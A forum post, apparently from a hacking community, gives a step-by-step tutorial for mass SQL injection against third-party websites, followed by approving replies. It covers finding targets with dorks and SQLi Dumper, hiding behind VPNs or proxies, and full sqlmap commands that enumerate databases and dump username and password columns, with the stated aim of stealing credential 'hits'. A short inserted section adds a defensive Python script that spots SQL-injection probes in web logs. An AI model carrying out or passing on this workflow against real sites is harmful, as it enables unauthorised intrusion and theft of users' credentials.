ForlaxPy 161

Preface:
I have been into DB hacking for quite a while now and always struggled finding new and private databases to get good hits from. I spoke with some very HQ members of this community which were able to expand my knowledge a lot. I planned on selling this as an E-Book but after all everyone should have access to private databases as long as they are part of this community! You might think this tutorial seems familiar at the beginning but the interesting part comes at the end so don't click away! Okay now enough of this BS and let's get started!

1. Python 2.7
2. SQLmap
3. SQLiDumper
4. VPN Accounts (Check Accounts Section) (Hide My Ass works best)
5*. RDP / VPS
* not needed but helpful

Let's get started:

1. Create a new folder called "DB Hacking" or something along these lines. (Why? -> Else you might lose the overview)
2. Download and install Python 2.7.XXX. Remember to add Python to your system path (Should look like this)
3. Download SQLiDumper 8.3 and add it into your folder.
Folder: DB Hacking
∟ SQLi Dumper 8.3
3. Download the newest sqlmap version and also add it into your folder.
Folder: DB Hacking
∟ SQLi Dumper 8.3
∟ sqlmapproject-xx
3. Go get yourself some dorks. You don't know how?
Or just use mine (These won't give you private DBs as other ppl can use them too)

4. Open SQLi Dumper 8.3 and paste your dorks (You can now choose between using HMA 2.8.24.0 or proxies)

How to use HMA:
1. Buy / Crack a premium Acc.
2. Download HMA 2.8.24.0
3. Put in your login details and connect for the first time
Then reconnect your VPN and click Start Scanner > URLS only in SQLi Dumper

How to use Proxies:
Go to www.socks24.org and download the newest proxy-list.
In SQLiDumper go to Tools & Settings -> Proxy
And paste all your downloaded proxies into the SOCKS5 4 column and test them
It will take about 20 mins to check them all.
...wait until all are checked...
Click ok.
Now from the dropdown choose SOCKS5 4 protocol.

5. Start checking the dorks.
This process will take a while and that's why I recommend using a RDP / VPS but you can do it on your main PC too.
After a few hrs you should have around 20k URLs and now can start checking them by canceling the Online Scanner. So switch to the exploitables tab and click < Start Scanner >
Wait for them to be checked completely.
Now go to the next tab "Injectables" and start this as well.
You will notice that most of the URLs are Non-Injectable (But these are what we are here for).

6. "Injecting the Non-Injectables" <- lmao sounds like a movie
Go to the Non-Injectables tab and CTRL+A > Right click > Clipboard
Go into your sqlmap folder and create a urls.txt
Folder: DB Hacking
∟ SQLi Dumper 8.3
∟ sqlmapproject-xx
∟ urls.txt
Paste all your Non-Injectables in there.
Now Shift + Right Mouse > Open cmd/powershell here
Now for the important command:
sqlmap.py -m "urls.txt" --random-agent -f --batch -o --tables --output-dir=OUTPUT
This command will now use the newest injections available and print out all the databases which are injectable.
You can always check which sites have already been tested by taking a look into the "OUTPUT" folder
There will be a lot of folders in the OUTPUT directory. As some are still Non-Injectable I wrote a script to only keep the ones that are:
Download https://www.file-upload.net/download-13433178/Cleaner.py.html
Run the file and you will be left with all folders containing a vulnerable database.
Now go back into the sqlmap folder and open the cmd/powershell again.
Choose a folder from your output dir and open the target.txt
Copy the URL in there.
Now in your cmd type:
sqlmap.py -u "yoururl" --batch --dbs --output-dir=OUTPUT
This will give you a list of the DBs:
Now choose a DB which sounds like it would include the user:pass and type:
sqlmap.py -u "yoururl" --batch -D "Database Name" --tables --output-dir=OUTPUT
Now you have all tables, look for one like "users/ registration/ login..." and type:
sqlmap.py -u "yoururl" --batch -D "Database Name" -T "Tablename" --columns --output-dir=OUTPUT
If you found the information you are looking for type:
sqlmap.py -u "yoururl" --batch -D "Database Name" -T "Tablename" -C "Columns (example: username, pass)" --dump --eta --threads=5 --output-dir=OUTPUT
This will now dump the columns and give you an ETA of when they are done.
Sometimes the passwords are encrypted and need to be dehashed which sqlmap does automatically. It's really fast and easy.
So have fun getting your private databases and show me some hits u got below.

Don't Forget to leave a Like if you found this helpful!
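
From the defender's side, the `--random-agent` flag in the commands above means a User-Agent signature for sqlmap will not fire, so the probing has to be recognised from the request parameters themselves. The following Python 3 code is an added example, not part of the original post: it scans access-log lines for SQL-injection probe patterns in query-string values and reports clients that exceed a threshold. The log lines, the pattern list, the threshold and the function name `find_sqli_scanners` are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in combined log format (not from a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /shop-item.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /shop-item.php?id=12%27 HTTP/1.1" 500 312 "-" "Opera/9.80 (Windows NT 6.1)"
203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /shop-item.php?id=12%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MSIE 8.0)"
203.0.113.7 - - [01/Jan/2024:10:00:04 +0000] "GET /shop-item.php?id=12%20UNION%20ALL%20SELECT%20NULL--%20- HTTP/1.1" 200 4800 "-" "Safari/537.36"
198.51.100.20 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?username=o%27brien HTTP/1.1" 200 900 "-" "Mozilla/5.0 (Macintosh)"
198.51.100.20 - - [01/Jan/2024:10:00:09 +0000] "GET /news-detail.php?news=44 HTTP/1.1" 200 2100 "-" "Mozilla/5.0 (Macintosh)"
"""

# Captures client IP, request target and User-Agent from a combined-format line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$')

# Illustrative probe patterns, applied to URL-decoded parameter values.
PROBES = [re.compile(p, re.I) for p in (
    r"\bunion\b.+\bselect\b",                        # UNION-based probing
    r"\b(?:and|or)\b\s+\d+\s*=\s*\d+",               # boolean tautology tests
    r"^\d+['\"]",                                    # numeric value with a stray quote
    r"\b(?:sleep|benchmark)\s*\(|\bwaitfor\s+delay\b",  # time-based tests
)]

def find_sqli_scanners(log_text, min_hits=3):
    """Return {ip: stats} for clients with at least min_hits probe-like requests."""
    hits = defaultdict(int)
    agents = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, user_agent = m.groups()
        agents[ip].add(user_agent)
        params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
        if any(p.search(value) for _, value in params for p in PROBES):
            hits[ip] += 1
    return {ip: {"probe_requests": n, "distinct_user_agents": len(agents[ip])}
            for ip, n in hits.items() if n >= min_hits}

if __name__ == "__main__":
    print(find_sqli_scanners(SAMPLE_LOG))
```

A high count of distinct User-Agent strings from one address alongside probe-like parameters is itself a useful signal, since a normal browser session does not rotate its agent on every request.
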
mesvak 362 "I spoke with some very HQ members of this community" think I was one of 'em, wasn't I
Ragnarok 21 Well done, it is nice to have a fresh method on how to dump some new databases. Appreciate :)
Tana Allen 75 I would love to try it out and like you <3
vasya45 21 I would love to try it out and like you
Madara000007 1 omg I was searching for this for a long time, thanks a lot boss
fxxxxxx21 0 Thanks, thank you very much, cheers
ZebzterXXZ 21 LIKED!
MasterhaX 0 thank you so much for sharing this! <3
AETERNUS 7 Linux or Windows needed?
picklelover404 1 thanks for the share bro. I've been looking for new ways to dump DB
aa123123 1 I spoke with some very HQ members of this coI spoke with some very HQ members of this co